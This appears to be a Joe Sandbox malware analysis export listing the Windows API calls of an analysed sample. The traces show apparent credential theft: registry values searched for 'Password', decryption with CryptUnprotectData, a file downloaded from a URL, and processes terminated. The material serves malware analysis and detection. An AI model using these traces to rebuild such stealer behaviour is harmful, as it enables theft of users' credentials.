                          • GlobalSize.KERNEL32(?), ref: 0064434D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                          • String ID:
                          • API String ID: 1264946473-0
                          • Opcode ID: 997f620de6b1fe3e61177d6ecac4fa7179ded942ba06dbcc51468c1334e6f803
                          • Instruction ID: b35b37fb9cf585e1f298033949a7b410ad37585606e53dbbc4448c7c5263cfdd
                          • Opcode Fuzzy Hash: 997f620de6b1fe3e61177d6ecac4fa7179ded942ba06dbcc51468c1334e6f803
                          • Instruction Fuzzy Hash: 7B511EB5910219EFDB10DFA4EC86AEEB7B9FF48711F104519F905A3250DB78AD058BA0
                          APIs
                          • lstrcat.KERNEL32(?,0129DA98), ref: 0063E00D
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0063E037
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0063E07D
                          • lstrcat.KERNEL32(?,?), ref: 0063E098
                          • lstrcat.KERNEL32(?,?), ref: 0063E0AC
                          • lstrcat.KERNEL32(?,0128AF00), ref: 0063E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0063E0D4
                          • lstrcat.KERNEL32(?,0129D1C8), ref: 0063E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0063E126
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 4230089145-0
                          • Opcode ID: e3e4b07efc22f1529acdd926ad0d78c269360f00cd33fb9e35a95c74e02d8fcf
                          • Instruction ID: 326b347eb8a927ebed8066e96fe7f8d1007d2d2d20d4a83a5692189b86ff8f24
                          • Opcode Fuzzy Hash: e3e4b07efc22f1529acdd926ad0d78c269360f00cd33fb9e35a95c74e02d8fcf
                          • Instruction Fuzzy Hash: F861BE7191022CEBCB65DB64DC45ADDB7BABF48300F1049A9F649A3290DB74AF858F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00626AFF
                          • InternetOpenA.WININET(0064CFEC,00000001,00000000,00000000,00000000), ref: 00626B2C
                          • StrCmpCA.SHLWAPI(?,0129E4C8), ref: 00626B4A
                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00626B6A
                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00626B88
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00626BA1
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00626BC6
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00626BF0
                          • CloseHandle.KERNEL32(00000000), ref: 00626C10
                          • InternetCloseHandle.WININET(00000000), ref: 00626C17
                          • InternetCloseHandle.WININET(?), ref: 00626C21
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                          • String ID:
                          • API String ID: 2500263513-0
                          • Opcode ID: c35ef28874a2e9535201b9091b2a83630c290bb3a2099f945feb37b277a72bde
                          • Instruction ID: bb88a03e49a22e151d28186d6544e6720f3ff9b4e4ecff20625ff9aa5c0960a7
                          • Opcode Fuzzy Hash: c35ef28874a2e9535201b9091b2a83630c290bb3a2099f945feb37b277a72bde
                          • Instruction Fuzzy Hash: C2415E71A00615EBDB20DB64EC85FAE77A9BB08702F004555FA05E7290EF74AD448BA4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00634F39), ref: 00644545
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0064454C
                          • wsprintfW.USER32 ref: 0064455B
                          • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 006445CA
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 006445D9
                          • CloseHandle.KERNEL32(00000000,?,?), ref: 006445E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                          • String ID: 9Oc$%hs$9Oc
                          • API String ID: 885711575-3578155578
                          • Opcode ID: d04b892ffe80f1185e708cfe22e8ae63624f0737693fa8b561341838d599a593
                          • Instruction ID: 2ce8bcd28c73e7a13e042cbc875088da4414e7ab7324917adf708e1f077d29c7
                          • Opcode Fuzzy Hash: d04b892ffe80f1185e708cfe22e8ae63624f0737693fa8b561341838d599a593
                          • Instruction Fuzzy Hash: 28314D72A00205BBDB10DBA4DC4ABDEB77ABF48701F104459FA05E7180EF74AA458BA5
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062BC1F
                          • lstrlen.KERNEL32(00000000), ref: 0062BC52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062BC7C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062BC84
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062BCAC
                          • lstrlen.KERNEL32(00654AD4), ref: 0062BD23
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: 264d99d108a9e68e912438862e2dca9371698aad071267a40709b2fbc950b8e6
                          • Instruction ID: 31e19476a19a2f191aa7091c85adf1b4472671794ae8960edebb87e6624e9774
                          • Opcode Fuzzy Hash: 264d99d108a9e68e912438862e2dca9371698aad071267a40709b2fbc950b8e6
                          • Instruction Fuzzy Hash: 6AA18B70A00A26DBCB60DF25E94AAEEB7B2FF44305F189469E4099B761DB39DC41CF44
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00645F2A
                          • std::_Xinvalid_argument.LIBCPMT ref: 00645F49
                          • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00646014
                          • memmove.MSVCRT(00000000,00000000,?), ref: 0064609F
                          • std::_Xinvalid_argument.LIBCPMT ref: 006460D0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 1975243496-4289949731
                          • Opcode ID: 8e2e9df827bc492d8346f696bf5c491b207a1927a3cc7a8f148032e3983ae6b4
                          • Instruction ID: ed3fa95aa0e793a4c0e4caa142c50a35dbc0d670bb20226ad759889accdb556d
                          • Opcode Fuzzy Hash: 8e2e9df827bc492d8346f696bf5c491b207a1927a3cc7a8f148032e3983ae6b4
                          • Instruction Fuzzy Hash: 70619D70700604DBDB28CF5CC99096EB7B7EF85704B244A59F4928B782C731ED85CB96
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0063E07D
                          • lstrcat.KERNEL32(?,?), ref: 0063E098
                          • lstrcat.KERNEL32(?,?), ref: 0063E0AC
                          • lstrcat.KERNEL32(?,0128AF00), ref: 0063E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0063E0D4
                          • lstrcat.KERNEL32(?,0129D1C8), ref: 0063E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0063E126
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFile
                          • String ID:
                          • API String ID: 3428472996-0
                          • Opcode ID: 55b163355bdc71bcc7a8251c57849b502cd749eccc91b4926c8d63317fb4a333
                          • Instruction ID: 73a8543b7fbb3ec925d523f7f5ccb0086db67d4c0422967e867d86a3398d2353
                          • Opcode Fuzzy Hash: 55b163355bdc71bcc7a8251c57849b502cd749eccc91b4926c8d63317fb4a333
                          • Instruction Fuzzy Hash: 7C41C571D1052CEBCB65EB64EC45ADD73B6BF48310F004AA9F54A93294DB349F858F90
                          APIs
                            • Part of subcall function 006277D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00627805
                            • Part of subcall function 006277D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0062784A
                            • Part of subcall function 006277D0: StrStrA.SHLWAPI(?,Password), ref: 006278B8
                            • Part of subcall function 006277D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 006278EC
                            • Part of subcall function 006277D0: HeapFree.KERNEL32(00000000), ref: 006278F3
                          • lstrcat.KERNEL32(00000000,00654AD4), ref: 00627A90
                          • lstrcat.KERNEL32(00000000,?), ref: 00627ABD
                          • lstrcat.KERNEL32(00000000, : ), ref: 00627ACF
                          • lstrcat.KERNEL32(00000000,?), ref: 00627AF0
                          • wsprintfA.USER32 ref: 00627B10
                          • lstrcpy.KERNEL32(00000000,?), ref: 00627B39
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00627B47
                          • lstrcat.KERNEL32(00000000,00654AD4), ref: 00627B60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                          • String ID: :
                          • API String ID: 398153587-3653984579
                          • Opcode ID: fe548e41a4cfa0b620025cb077817083f0694d2d33904782b47e56f9c4c7995e
                          • Instruction ID: f2a8364d1240f3949e8a660abedeecf98c4d3b334ada86a9a274b0f5508fd20f
                          • Opcode Fuzzy Hash: fe548e41a4cfa0b620025cb077817083f0694d2d33904782b47e56f9c4c7995e
                          • Instruction Fuzzy Hash: 3E31C272A00A24EFCB10DF68EC45DAAB77BFB84312F140519E946A3340DB34A945CF60
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 0063820C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00638243
                          • lstrlen.KERNEL32(00000000), ref: 00638260
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00638297
                          • lstrlen.KERNEL32(00000000), ref: 006382B4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006382EB
                          • lstrlen.KERNEL32(00000000), ref: 00638308
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00638337
                          • lstrlen.KERNEL32(00000000), ref: 00638351
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00638380
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: f8b91ac135a662ba2a4e17adc7946c191c5707593510db9a38e594a01549925e
                          • Instruction ID: 344e938731e7c080bda591cbfa75e50759f02c0b35cb35084e5b9edde35f1103
                          • Opcode Fuzzy Hash: f8b91ac135a662ba2a4e17adc7946c191c5707593510db9a38e594a01549925e
                          • Instruction Fuzzy Hash: 67515971900B12AFEB149FA9D858AEAB7AAFF44700F154514BD06EB344EF34E950CBE0
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00627805
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0062784A
                          • StrStrA.SHLWAPI(?,Password), ref: 006278B8
                            • Part of subcall function 00627750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0062775E
                            • Part of subcall function 00627750: RtlAllocateHeap.NTDLL(00000000), ref: 00627765
                            • Part of subcall function 00627750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0062778D
                            • Part of subcall function 00627750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006277AD
                            • Part of subcall function 00627750: LocalFree.KERNEL32(?), ref: 006277B7
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006278EC
                          • HeapFree.KERNEL32(00000000), ref: 006278F3
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00627A35
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
